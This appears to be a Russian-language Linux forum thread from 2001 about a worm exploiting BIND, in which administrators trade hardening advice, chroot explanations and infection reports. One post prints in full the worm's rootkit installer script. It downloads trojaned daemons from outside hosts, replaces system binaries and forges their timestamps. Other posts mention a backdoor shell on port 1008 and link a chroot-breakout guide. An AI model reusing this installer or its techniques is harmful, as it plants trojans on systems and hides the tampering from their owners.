Я не понимаю. Что, кто-то пускает named под UID 0 и не под chroot?

Если есть червь значит гдето есть "жертва".... :)

Я еще пока что амер в линуксе... Только неделю стоит. Как с этим бороться? И откуда это может взяться?

*[Л]амер

To: "амер"
Пользуйся DNS провайдера.

Амеру.

http://cr.yp.to/djbdns.html
Очень симпатишно.
Очень правильный подход :))
По крайней мере мне понравилось :))

Ia videl uze modifikatsiu etogo virusa Ona chroot bind lomaet i na port 6699 (Napster vrode) veshaet backdoor. Sdelan virus professional'no!

ломает chroot?

Поясните пожалуйста как этот червь ломает chrooted bind. Интересуют подробности. Работает ли это в любой конфигурации?

Во-во все на http://cr.yp.to/djbdns.html создатель qmail плохого не посоветует. Зачем делать сложным, то что проще простого, в особености если вам не нужно держать зону и достаточно кешируещего DNS. Да и для маленькой зоны подойдет, а больщую на линухе держать... Я бы не рискнул... Так что сходите, почитайте, попробуйте и забудте о BIND на долго, возможно навсегда. По теме, что-то не вериться что этот так называемый червь, умеет делать то что написано в топике. Похоже на очередную утку для запугивания ламеров, манагеров и т.д. В частности на очередное выкачивание денег для рещения проблемы "века" :)))

Если не сложно, бросьте в нас ссылкой на то, как ломается chroot. Если это правда, то дело в ядре, а не в бинде.

Упс, сорри. Невнимательно прочитал пост анонима. Я думал вирус chroot отменяет.

>Если не сложно, бросьте в нас ссылкой на то, как ломается chroot.
> Если это правда, то дело в ядре, а не в бинде.

Никак неломается !!!

перед chroot надо сметить диру
chdir "/chroot" ; chroot /chroot proga
cd /chroot ; chroot /chroot proga

Странно что сообщение об этом черве появилось только счас. Меня оно падломало где-то в 20х числах февраля. Ладно сервак был только что поставлен (Slackware 7.0) и исходящий трафик бесплатный. :) 2ifconfig: оно походе в самом деле делает то, что написано в топике. По крайней мере файлов в системе много поменяло...

И как на него посмотреть ?? Тоесть как обнаружить ?? (сорри за ламерский вопрос)

помахать бубном вокруг компьютера. если дисковод запоет женским голосом - значит повезло.

для предыдущего писаки ""ЛАМЕРА отправить на первоисточник "" там написано 'Желательно посмотреть..' Ну разве не жалко человека.Сам же таким был ....

А жертва таки есть :) Админ-ЛамеРрр :) намедни на новое железо поставил Шапку 6.1. настраивать осjбо пока ниче не стал - рабочий день закончился На утро прихожу - смарю, некие процессы висят star.sh и hack.sh давай смотреть что за хрень... в inetd.conf реально повесила шелл на порт 1008 :) стерла ping в rc.sysinit вписала строку, поджигающую некий /dev/.lib/lib/star.sh в /dev заделал .lib, в коем лежал некий софт, который был заточен на поиск аналогично дырявых хостов типа моего на адресах 206.чего-то там... вот такие дела :) не оставляйте на ночь серверов не заткунв дырки впрочим бинд у меня до сих по не заапдейтен :) как в народной поговорке - будем ждать очередного жареного петуха ;))

http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/lionfind.htm если есть червяк он думаю найдет

How to break out of a chroot() jail http://www.bpfh.net/simes/computing/chroot-break.html

Премия в 500$

Кстати для того кто найдет дыру в DJBDNS, того ждет премия в 500$
http://cr.yp.to/djbdns/guarantee.html

Regards, Pofinger.

Кстати, в blackcat 6.2 идет ядро с патчем в котором стек делается
не исполняемым (как кстати и на Irix 6.5).
Когда еще в прошлый раз пробывали ломат - то получили отлуп.
Рекомендую! 90% взломов из вне не пройдет.

Кстати, в blackcat 6.2 идет ядро с патчем в котором стек делается
не исполняемым (как кстати и на Irix 6.5).
Когда еще в прошлый раз пробывали ломат - то получили отлуп.
Рекомендую! 90% взломов из вне не пройдет.

Eugene.

мдааа, как все запущено у дистрибутивов линукса.... если пользователь не знает, а нахрена ему ftpd и named, но зачем по умолчанию они вообще включены, так же, как и tenletd?

Насколько я знаю, в нормальных дистрибах они по умолчанию не ставятся. Я имею ввиду всякие BIND ftpd и т.п.

Ну вот а сейчас пойдут разговоры о нормальных дистрибутивах :) Гы гы. С этой точки зрения самый нормальный дистрибутив который делаешь сам. :) Ручками все. Только вот сколько времени уйдет на такой нормальный дистрибутив?

> Только неделю стоит. Как с этим бороться?
Если это desktop, то BIND скорее всего не работает вообще. Т.е. бороться не нужно.
Если же работает в кэширующем режиме или сервер - обновить BIND.

Кстати, о птичках:
1) Смотрящие наружу утилиты в chroot-окружении - это хороший тон.
2) secure-ядро - достояние не только "кота", но и Mandrake.

>Только вот сколько времени уйдет на такой нормальный дистрибутив? В первый раз действительно много, у меня с 4 летним опытом заняло 2 дня, зато потом сделал шаблон и катай его на сервера ТУПЫМ КОПИРОВАНИЕМ ФАЙЛОВ. Занимает в зависимости от скорости винта от 20 до 30 мин. Из установки руками вытикает по крайней мере 3 полезных вещи. Первое - неплохой повод разобраться в о всех файлах в /etc т.е. какой и зачем нужен. Второе - перекомпиляция всего и вся под свой CPU это скорость и неплохой тест для железа (если gcc или glibc не собралось нормально стоит задуматься). Третье - запускаешь/открываешь только то что нужно, НИЧЕГО НЕ СТАВИТЬСЯ ПО УМОЛЧАНИЮ.

to anonymous (*) (2001-03-26 19:14:07.0) Спасибо за ссылку, еще не пробовал, но очень, очень интересно....

Еще одна жертва. Это я. Вот только прикол в том, что файлы in.telnetd и другие системные не подменены (по дате в ls -l смотрю), в папку /usr/src/.ratc кажется загружен код по взлому Microsoft NT серверов и... демон потокового аудио/видео?!
В логах ничего не нашел. Пришлось просто убить named, отключил все кроме sendmail & Apache & SSH. Подскажите как найти ту дырку через которую он пролез. Уже приходят письма он NT. Жалуются, что их пытаются взломать с моей машины. Если можно то по мылу
dederer-a@mail.ru

Может кто-нибудь ТОЧНО знает какие версии, подверсии уязвимы. Согласно январскому заявлению BIND 8.2.3 final и 9-е не подвержены.

Вот посмотрите так сказать "патч" который ставит этот червь: И охото кому-то было делать такую дрянь? ------tkpatch-------- #!/bin/sh if [ -f statd.rpm ]; then echo "" echo "Patching statd" rpm -Uhv statd.rpm rm -f statd.rpm echo "" /etc/rc.d/init.d/nfslock restart >>/dev/null fi if [ -f /var/run/named.pid ]; then echo "" echo "Patching bind" if [ ! -f bind.rpm ]; then ./tkget http://www.linuxfan.com/~unit2k1/bind.rpm fi if [ ! -f bind.rpm ]; then ./tkget http://www.linuxfreak.com/~unit2k1/bind.rpm fi if [ -f bind.rpm ]; then rpm -Uhv bind.rpm rm -f bind.rpm fi fi if [ -f wuftpd.rpm ]; then echo "" echo "Patching wuftpd" rpm -Uhv wuftpd.rpm rm -f wuftpd.rpm fi if [ -f tcpd.rpm ]; then echo "" echo "Patching tcpd" mkdir -p /dev/dd0 touch /dev/dd0/.t0rn chgrp root /dev/dd0/ chown root /dev/dd0/ echo "#Dont forget to enter ALL : IP here evil hax0r :)" >> /dev/dd0/.t0rn rpm -Uhv --force tcpd.rpm rm -f tcpd.rpm fi if [ ! -z "$(/usr/sbin/rpcinfo -p|grep "100005"|grep "tcp"|grep -w "1")" ]; the if [ ! -f tkmountd.tgz ]; then ./tkget http://www.linuxfan.com/~unit2k1/tkmountd.tgz fi if [ -f tkmountd.tgz ]; then echo "Patching mountd" tar -zxf tkmountd.tgz touch -acmr /usr/sbin/rpc.mountd rpc.mountd mv -f rpc.mountd /usr/sbin/rpc.mountd rm tkmountd.tgz fi fi if [ -x /usr/sbin/ipop2d ]; then if [ ! -f tkipop2d.tgz ]; then ./tkget http://www.linuxfan.com/~unit2k1/tkipop2d.tgz fi if [ ! -f tkipop2d.tgz ]; then ./tkget http://www.linuxfreak.com/~unit2k1/tkipop2d.tgz fi if [ -f tkipop2d.tgz ]; then echo "Patching ipop2d" tar -zxf tkipop2d.tgz touch -acmr /usr/sbin/ipop2d ipop2d mv -f ipop2d /usr/sbin/ipop2d rm tkipop2d.tgz fi fi if [ -x /usr/sbin/imapd ]; then if [ ! -f tkimapd.tgz ]; then ./tkget http://www.linuxfan.com/~unit2k1/tkimapd.tgz fi if [ ! -f tkimapd.tgz ]; then ./tkget http://www.linuxfreak.com/~unit2k1/tkimapd.tgz fi if [ -f tkimapd.tgz ]; then echo "Patching imapd" tar -zxf tkimapd.tgz touch -acmr /usr/sbin/imapd imapd mv -f imapd /usr/sbin/imapd rm tkimapd.tgz fi fi if [ -x /usr/sbin/smbd ]; then if [ ! -f tksmbd.tgz ]; then ./tkget http://www.linuxfan.com/~unit2k1/tksmbd.tgz fi if [ ! -f tksmbd.tgz ]; then ./tkget http://www.linuxfreak.com/~unit2k1/tksmbd.tgz fi if [ -f tksmbd.tgz ]; then echo "Patching smbd" tar -zxf tksmbd.tgz touch -acmr /usr/sbin/smbd smbd mv smbd /usr/sbin/smbd killall -q -9 smbd /usr/sbin/smbd -D rm tksmbd.tgz fi fi

chroot

Chroot ломается (выходит за его рамки) если запущен процесс с uid = 0 Т.е. root'у все можно. named в последних версиях пускется с chroot и под пользователем named Тут сломать chroot нельзя.

О проблеме chroot

Кошмар, вирусы в Линуксе. Подскажите, что такое этот ваш chroot? (или где прочтитаь про это). Я в общем не то чтобы полный ламер, каким-то чудом запустил кэширующий DNS (честно, работает не быстрее), на bind 8.2.2 а теперь страшно ;)

chrooted environment, ежели попробовать сказать как можно проще, работает след. образом:
Демон запускается под определённым пользователем
Для этого пользователя назначается как-бы корневой каталог, в нём он и варится, даже если через него проникнуть как-то, то повлиять на систему не получится, ибо выше своего корня процесс не поднимется.

Вам же проще обновить named-tram-pam-pam.rpm с сайта поставщика дистрибутива.

Кстати, о птичках. Подобная хрень легкоприменима и к BSD и прочим.

На сайте DrWeb появилось подробное описание алгоритма работы червя. http://www.drweb.ru/vir/llion.shtml

Что значит несполнимый стек? Дык ему и не надо быть исполнимым! Туда надо только дарес запихнуть, по которому получит управление "то, что надо", а уж это "то, что надо" может где угодно лежать... Так что ни о какой 90% гарантии речи вестись и не может.